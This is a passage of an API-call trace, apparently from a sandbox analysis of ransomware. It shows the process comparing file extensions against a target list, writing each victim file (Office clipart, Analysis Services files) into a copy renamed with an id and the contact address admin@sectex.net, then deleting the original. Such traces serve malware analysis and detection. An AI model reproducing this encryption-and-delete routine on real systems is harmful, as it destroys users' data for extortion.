	[0051.702] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0051.702] lstrlenW (lpString=".pdf") returned 4
	[0051.702] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0051.702] lstrlenW (lpString=".xls") returned 4
	[0051.702] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0051.702] lstrlenW (lpString=".xlsx") returned 5
	[0051.702] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0051.702] lstrlenW (lpString=".ppt") returned 4
	[0051.702] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0051.702] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.702] lstrlenW (lpString=".zip") returned 4
	[0051.702] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0051.702] lstrlenW (lpString=".rar") returned 4
	[0051.702] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0051.702] lstrlenW (lpString=".bz2") returned 4
	[0051.702] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0051.702] lstrlenW (lpString=".7z") returned 3
	[0051.703] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString=".dbf") returned 4
	[0051.703] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString=".1cd") returned 4
	[0051.703] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString=".jpg") returned 4
	[0051.703] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString=".doc") returned 4
	[0051.703] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString=".docx") returned 5
	[0051.703] lstrcmpiW (lpString1=".docx", lpString2="L.wmv") returned -1
	[0051.703] lstrlenW (lpString=".pdf") returned 4
	[0051.703] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString=".xls") returned 4
	[0051.703] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1
	[0051.703] lstrlenW (lpString=".xlsx") returned 5
	[0051.703] lstrcmpiW (lpString1=".xlsx", lpString2="L.wmv") returned -1
	[0051.703] lstrlenW (lpString=".ppt") returned 4
	[0051.703] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.703] lstrlenW (lpString=".zip") returned 4
	[0051.703] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1
	[0051.703] lstrlenW (lpString=".rar") returned 4
	[0051.703] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString=".bz2") returned 4
	[0051.703] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1
	[0051.703] lstrlenW (lpString=".7z") returned 3
	[0051.703] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1
	[0051.703] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.704] lstrlenW (lpString=".dbf") returned 4
	[0051.704] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1
	[0051.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.704] lstrlenW (lpString=".1cd") returned 4
	[0051.704] lstrcmpiW (lpString1=".1cd", lpString2=".wmv") returned -1
	[0051.704] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\TravelIntroToMainMask_PAL.wmv") returned 80
	[0051.704] lstrlenW (lpString=".jpg") returned 4
	[0051.704] lstrcmpiW (lpString1=".jpg", lpString2=".wmv") returned -1
	[0051.704] lstrcmpiW (lpString1=".xsl", lpString2=".bot") returned 1
	[0051.704] lstrlenW (lpString="as90.xsl") returned 8
	[0051.704] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0052.267] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=18738) returned 1
	[0052.267] CloseHandle (hObject=0x1cc) returned 1
	[0052.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 0x20
	[0052.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0052.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc
	[0052.267] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.267] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x224
	[0052.267] GetLastError () returned 0x0
	[0052.267] ReadFile (in: hFile=0x1cc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x4932, lpOverlapped=0x0) returned 1
	[0052.270] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x4940, lpOverlapped=0x0) returned 1
	[0052.271] ReadFile (in: hFile=0x1cc, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.271] WriteFile (in: hFile=0x224, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0052.271] SetEndOfFile (hFile=0x224) returned 1
	[0052.271] CloseHandle (hObject=0x224) returned 1
	[0052.272] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.272] SetEndOfFile (hFile=0x1cc) returned 1
	[0052.272] CloseHandle (hObject=0x1cc) returned 1
	[0052.272] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.273] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl")) returned 1
	[0052.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.273] lstrlenW (lpString=".doc") returned 4
	[0052.273] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString=".docx") returned 5
	[0052.273] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.273] lstrlenW (lpString=".pdf") returned 4
	[0052.273] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString=".xls") returned 4
	[0052.273] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString=".xlsx") returned 5
	[0052.273] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.273] lstrlenW (lpString=".ppt") returned 4
	[0052.273] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.273] lstrlenW (lpString=".zip") returned 4
	[0052.273] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.273] lstrlenW (lpString=".rar") returned 4
	[0052.273] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString=".bz2") returned 4
	[0052.273] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.273] lstrlenW (lpString=".7z") returned 3
	[0052.274] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString=".dbf") returned 4
	[0052.274] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString=".1cd") returned 4
	[0052.274] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString=".jpg") returned 4
	[0052.274] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString=".doc") returned 4
	[0052.274] lstrcmpiW (lpString1=".doc", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString=".docx") returned 5
	[0052.274] lstrcmpiW (lpString1=".docx", lpString2="0.xsl") returned -1
	[0052.274] lstrlenW (lpString=".pdf") returned 4
	[0052.274] lstrcmpiW (lpString1=".pdf", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString=".xls") returned 4
	[0052.274] lstrcmpiW (lpString1=".xls", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString=".xlsx") returned 5
	[0052.274] lstrcmpiW (lpString1=".xlsx", lpString2="0.xsl") returned -1
	[0052.274] lstrlenW (lpString=".ppt") returned 4
	[0052.274] lstrcmpiW (lpString1=".ppt", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.274] lstrlenW (lpString=".zip") returned 4
	[0052.274] lstrcmpiW (lpString1=".zip", lpString2=".xsl") returned 1
	[0052.274] lstrlenW (lpString=".rar") returned 4
	[0052.274] lstrcmpiW (lpString1=".rar", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString=".bz2") returned 4
	[0052.274] lstrcmpiW (lpString1=".bz2", lpString2=".xsl") returned -1
	[0052.274] lstrlenW (lpString=".7z") returned 3
	[0052.274] lstrcmpiW (lpString1=".7z", lpString2="xsl") returned -1
	[0052.274] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.275] lstrlenW (lpString=".dbf") returned 4
	[0052.275] lstrcmpiW (lpString1=".dbf", lpString2=".xsl") returned -1
	[0052.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.275] lstrlenW (lpString=".1cd") returned 4
	[0052.275] lstrcmpiW (lpString1=".1cd", lpString2=".xsl") returned -1
	[0052.275] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned 76
	[0052.275] lstrlenW (lpString=".jpg") returned 4
	[0052.275] lstrcmpiW (lpString1=".jpg", lpString2=".xsl") returned -1
	[0052.275] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0052.275] lstrlenW (lpString="AG00021_.GIF") returned 12
	[0052.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0053.583] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=14873) returned 1
	[0053.583] CloseHandle (hObject=0x230) returned 1
	[0053.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 0x20
	[0053.583] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0053.583] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.583] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.059] GetLastError () returned 0x0
	[0055.059] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x3a19, lpOverlapped=0x0) returned 1
	[0055.061] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0x3a20, lpOverlapped=0x0) returned 1
	[0055.062] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.062] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.062] SetEndOfFile (hFile=0x21c) returned 1
	[0055.088] CloseHandle (hObject=0x21c) returned 1
	[0055.089] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.089] SetEndOfFile (hFile=0x230) returned 1
	[0055.089] CloseHandle (hObject=0x230) returned 1
	[0055.089] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.090] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00021_.gif")) returned 1
	[0055.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.090] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.090] lstrlenW (lpString=".doc") returned 4
	[0055.090] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.090] lstrlenW (lpString=".docx") returned 5
	[0055.090] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.090] lstrlenW (lpString=".pdf") returned 4
	[0055.090] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.090] lstrlenW (lpString=".xls") returned 4
	[0055.090] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.090] lstrlenW (lpString=".xlsx") returned 5
	[0055.090] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.090] lstrlenW (lpString=".ppt") returned 4
	[0055.091] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString=".zip") returned 4
	[0055.091] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString=".rar") returned 4
	[0055.091] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString=".bz2") returned 4
	[0055.091] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.091] lstrlenW (lpString=".7z") returned 3
	[0055.091] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString=".dbf") returned 4
	[0055.091] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString=".1cd") returned 4
	[0055.091] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString=".jpg") returned 4
	[0055.091] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.091] lstrlenW (lpString=".doc") returned 4
	[0055.091] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.091] lstrlenW (lpString=".docx") returned 5
	[0055.091] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0055.091] lstrlenW (lpString=".pdf") returned 4
	[0055.091] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString=".xls") returned 4
	[0055.091] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString=".xlsx") returned 5
	[0055.091] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0055.091] lstrlenW (lpString=".ppt") returned 4
	[0055.091] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0055.091] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.092] lstrlenW (lpString=".zip") returned 4
	[0055.092] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0055.092] lstrlenW (lpString=".rar") returned 4
	[0055.092] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0055.092] lstrlenW (lpString=".bz2") returned 4
	[0055.092] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0055.092] lstrlenW (lpString=".7z") returned 3
	[0055.092] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0055.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.092] lstrlenW (lpString=".dbf") returned 4
	[0055.092] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0055.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.092] lstrlenW (lpString=".1cd") returned 4
	[0055.092] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0055.092] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00021_.GIF") returned 63
	[0055.092] lstrlenW (lpString=".jpg") returned 4
	[0055.092] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0055.092] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0055.092] lstrlenW (lpString="AG00126_.GIF") returned 12
	[0055.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.093] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=3140) returned 1
	[0055.093] CloseHandle (hObject=0x230) returned 1
	[0055.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 0x20
	[0055.093] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0055.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0055.093] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.093] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.093] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0055.093] GetLastError () returned 0x0
	[0055.093] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0xc44, lpOverlapped=0x0) returned 1
	[0055.095] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xc50, lpOverlapped=0x0) returned 1
	[0055.095] ReadFile (in: hFile=0x230, lpBuffer=0xad80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa19fed4, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesRead=0xa19fed4*=0x0, lpOverlapped=0x0) returned 1
	[0055.096] WriteFile (in: hFile=0x21c, lpBuffer=0xad80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa19fc9c, lpOverlapped=0x0 | out: lpBuffer=0xad80020*, lpNumberOfBytesWritten=0xa19fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0055.096] SetEndOfFile (hFile=0x21c) returned 1
	[0055.096] CloseHandle (hObject=0x21c) returned 1
	[0055.096] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa19fec8 | out: lpNewFilePointer=0x0) returned 1
	[0055.096] SetEndOfFile (hFile=0x230) returned 1
	[0055.097] CloseHandle (hObject=0x230) returned 1
	[0055.097] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0055.097] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1
	[0055.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.097] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63
	[0055.097] lstrlenW (lpString=".doc") returned 4
	[0055.097] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0055.097] lstrlenW (lpString=".docx") returned 5
